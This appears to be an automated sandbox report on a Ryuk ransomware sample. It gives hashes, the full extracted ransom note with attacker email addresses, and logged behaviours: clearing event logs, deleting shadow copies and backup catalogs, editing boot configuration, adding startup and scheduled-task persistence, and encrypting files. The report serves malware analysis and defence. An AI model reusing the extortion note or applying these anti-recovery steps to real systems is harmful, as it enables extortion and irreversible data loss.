ryuk | 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

Resubmissions

21-09-2022 20:38

220921-ze6ayshae5 10

21-09-2022 20:33

220921-zbzzrscfcl 10

Analysis

max time kernel
582s
max time network
566s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
21-09-2022 20:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ryuk.exe
Size

885KB
MD5

35194c73ff38dd6c3bed7c0efcff6826
SHA1

1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256

5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512

cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
SSDEEP

12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Recoverfile@aol.com or Recoverfile1@aol.com You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

Recoverfile@aol.com

Recoverfile1@aol.com

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
2172	wevtutil.exe
2776	wevtutil.exe
2880	wevtutil.exe
2432	wevtutil.exe
2748	wevtutil.exe
2732	wevtutil.exe
2432	wevtutil.exe
2372	wevtutil.exe
2656	wevtutil.exe
2756	wevtutil.exe
3040	wevtutil.exe
2216	wevtutil.exe
2920	wevtutil.exe
324	wevtutil.exe
2660	wevtutil.exe
2552	wevtutil.exe
2696	wevtutil.exe
828	wevtutil.exe
2928	wevtutil.exe
3032	wevtutil.exe
3012	wevtutil.exe
2692	wevtutil.exe
2256	wevtutil.exe
1408	wevtutil.exe
2336	wevtutil.exe
3004	wevtutil.exe
2316	wevtutil.exe
2368	wevtutil.exe
2324	wevtutil.exe
2788	wevtutil.exe
1060	wevtutil.exe
2452	wevtutil.exe
2920	wevtutil.exe
2800	wevtutil.exe
2992	wevtutil.exe
2696	wevtutil.exe
3016	wevtutil.exe
2236	wevtutil.exe
2576	wevtutil.exe
2792	wevtutil.exe
2544	wevtutil.exe
2388	wevtutil.exe
2972	wevtutil.exe
2768	wevtutil.exe
384	wevtutil.exe
2212	wevtutil.exe
1824	wevtutil.exe
2988	wevtutil.exe
2572	wevtutil.exe
3008	wevtutil.exe
1792	wevtutil.exe
2588	wevtutil.exe
2216	wevtutil.exe
2604	wevtutil.exe
2904	wevtutil.exe
3068	wevtutil.exe
2656	wevtutil.exe
2792	wevtutil.exe
2136	wevtutil.exe
2520	wevtutil.exe
2840	wevtutil.exe
2532	wevtutil.exe
2752	wevtutil.exe
2680	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

584 bcdedit.exe
1260 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1128 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
584	bcdedit.exe
1260	bcdedit.exe

pid	process
1128	wbadmin.exe

Drops startup file 3 IoCs

Processes:

attrib.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

772 icacls.exe

pid	process
772	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ryuk.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\J:	ryuk.exe
File opened (read-only)	\??\L:	ryuk.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\O:	ryuk.exe
File opened (read-only)	\??\E:	ryuk.exe
File opened (read-only)	\??\P:	ryuk.exe
File opened (read-only)	\??\R:	ryuk.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\K:	ryuk.exe
File opened (read-only)	\??\U:	ryuk.exe
File opened (read-only)	\??\W:	ryuk.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	ryuk.exe
File opened (read-only)	\??\H:	ryuk.exe
File opened (read-only)	\??\A:	ryuk.exe
File opened (read-only)	\??\B:	ryuk.exe
File opened (read-only)	\??\S:	ryuk.exe
File opened (read-only)	\??\Y:	ryuk.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\M:	ryuk.exe
File opened (read-only)	\??\N:	ryuk.exe
File opened (read-only)	\??\Q:	ryuk.exe
File opened (read-only)	\??\Z:	ryuk.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\T:	ryuk.exe
File opened (read-only)	\??\X:	ryuk.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	ryuk.exe
File opened (read-only)	\??\I:	ryuk.exe
File opened (read-only)	\??\V:	ryuk.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

Processes:

ryuk.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\QuizShow.potx.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03464_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03513_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.ELM.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ADRESPEL.POC.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\MS.WPG.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RESUME.XML.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21377_.GIF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN109.XML.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\St_Johns.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\WPGIMP32.FLT.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105376.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00668_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSYUBIN7.DLL.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WPEQU532.DLL.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18232_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Library\EUROTOOL.XLAM.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01180_.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveResume.dotx.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\EXP_XPS.DLL.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVELOPE.DPV.[Recoverfile@aol.com].RYK	ryuk.exe

Drops file in Windows directory 5 IoCs

Processes:

ryuk.exewbadmin.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	ryuk.exe
File created	C:\Windows\hrmlog1	ryuk.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1840 sc.exe
1164 sc.exe
1424 sc.exe
1200 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1464 schtasks.exe
1104 schtasks.exe
2788 schtasks.exe
1044 schtasks.exe
1924 schtasks.exe

pid	process
1840	sc.exe
1164	sc.exe
1424	sc.exe
1200	sc.exe

pid	process
1464	schtasks.exe
1104	schtasks.exe
2788	schtasks.exe
1044	schtasks.exe
1924	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1860	vssadmin.exe
2336	vssadmin.exe
2552	vssadmin.exe
2300	vssadmin.exe
2408	vssadmin.exe
2480	vssadmin.exe
2148	vssadmin.exe
2588	vssadmin.exe
2372	vssadmin.exe
2444	vssadmin.exe
2516	vssadmin.exe
1948	vssadmin.exe
2188	vssadmin.exe
2224	vssadmin.exe
2260	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

860 taskkill.exe
564 taskkill.exe
1124 taskkill.exe
1548 taskkill.exe
700 taskkill.exe
Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXE

pid process

564 NOTEPAD.EXE
1060 NOTEPAD.EXE
Runs net.exe

pid	process
860	taskkill.exe
564	taskkill.exe
1124	taskkill.exe
1548	taskkill.exe
700	taskkill.exe

pid	process
564	NOTEPAD.EXE
1060	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ryuk.exe

pid	process
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe
576	ryuk.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeAUDIODG.EXEWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exevssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: 33	960	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	960	AUDIODG.EXE
Token: 33	960	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	960	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	1472	WMIC.exe
Token: SeSecurityPrivilege	1472	WMIC.exe
Token: SeTakeOwnershipPrivilege	1472	WMIC.exe
Token: SeLoadDriverPrivilege	1472	WMIC.exe
Token: SeSystemProfilePrivilege	1472	WMIC.exe
Token: SeSystemtimePrivilege	1472	WMIC.exe
Token: SeProfSingleProcessPrivilege	1472	WMIC.exe
Token: SeIncBasePriorityPrivilege	1472	WMIC.exe
Token: SeCreatePagefilePrivilege	1472	WMIC.exe
Token: SeBackupPrivilege	1472	WMIC.exe
Token: SeRestorePrivilege	1472	WMIC.exe
Token: SeShutdownPrivilege	1472	WMIC.exe
Token: SeDebugPrivilege	1472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1472	WMIC.exe
Token: SeRemoteShutdownPrivilege	1472	WMIC.exe
Token: SeUndockPrivilege	1472	WMIC.exe
Token: SeManageVolumePrivilege	1472	WMIC.exe
Token: 33	1472	WMIC.exe
Token: 34	1472	WMIC.exe
Token: 35	1472	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1472	WMIC.exe
Token: SeSecurityPrivilege	1472	WMIC.exe
Token: SeTakeOwnershipPrivilege	1472	WMIC.exe
Token: SeLoadDriverPrivilege	1472	WMIC.exe
Token: SeSystemProfilePrivilege	1472	WMIC.exe
Token: SeSystemtimePrivilege	1472	WMIC.exe
Token: SeProfSingleProcessPrivilege	1472	WMIC.exe
Token: SeIncBasePriorityPrivilege	1472	WMIC.exe
Token: SeCreatePagefilePrivilege	1472	WMIC.exe
Token: SeBackupPrivilege	1472	WMIC.exe
Token: SeRestorePrivilege	1472	WMIC.exe
Token: SeShutdownPrivilege	1472	WMIC.exe
Token: SeDebugPrivilege	1472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1472	WMIC.exe
Token: SeRemoteShutdownPrivilege	1472	WMIC.exe
Token: SeUndockPrivilege	1472	WMIC.exe
Token: SeManageVolumePrivilege	1472	WMIC.exe
Token: 33	1472	WMIC.exe
Token: 34	1472	WMIC.exe
Token: 35	1472	WMIC.exe
Token: SeBackupPrivilege	1572	vssvc.exe
Token: SeRestorePrivilege	1572	vssvc.exe
Token: SeAuditPrivilege	1572	vssvc.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeBackupPrivilege	1548	vssvc.exe
Token: SeRestorePrivilege	1548	vssvc.exe
Token: SeAuditPrivilege	1548	vssvc.exe
Token: SeSecurityPrivilege	2292	wevtutil.exe
Token: SeBackupPrivilege	2292	wevtutil.exe
Token: SeSecurityPrivilege	2344	wevtutil.exe
Token: SeBackupPrivilege	2344	wevtutil.exe
Token: SeSecurityPrivilege	2332	wevtutil.exe
Token: SeBackupPrivilege	2332	wevtutil.exe
Token: SeSecurityPrivilege	2388	wevtutil.exe
Token: SeBackupPrivilege	2388	wevtutil.exe
Token: SeSecurityPrivilege	2372	wevtutil.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

chrome.exe

pid	process
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

chrome.exe

pid	process
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe
1672	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ryuk.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 576 wrote to memory of 2044	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 2044	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 2044	576	ryuk.exe	cmd.exe
PID 2044 wrote to memory of 1044	2044	cmd.exe	schtasks.exe
PID 2044 wrote to memory of 1044	2044	cmd.exe	schtasks.exe
PID 2044 wrote to memory of 1044	2044	cmd.exe	schtasks.exe
PID 576 wrote to memory of 1664	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1664	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1664	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1280	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1280	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1280	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 948	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 948	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 948	576	ryuk.exe	cmd.exe
PID 948 wrote to memory of 1924	948	cmd.exe	schtasks.exe
PID 948 wrote to memory of 1924	948	cmd.exe	schtasks.exe
PID 948 wrote to memory of 1924	948	cmd.exe	schtasks.exe
PID 576 wrote to memory of 1520	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1520	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1520	576	ryuk.exe	cmd.exe
PID 1520 wrote to memory of 1536	1520	cmd.exe	attrib.exe
PID 1520 wrote to memory of 1536	1520	cmd.exe	attrib.exe
PID 1520 wrote to memory of 1536	1520	cmd.exe	attrib.exe
PID 576 wrote to memory of 1324	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1324	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1324	576	ryuk.exe	cmd.exe
PID 1324 wrote to memory of 1464	1324	cmd.exe	schtasks.exe
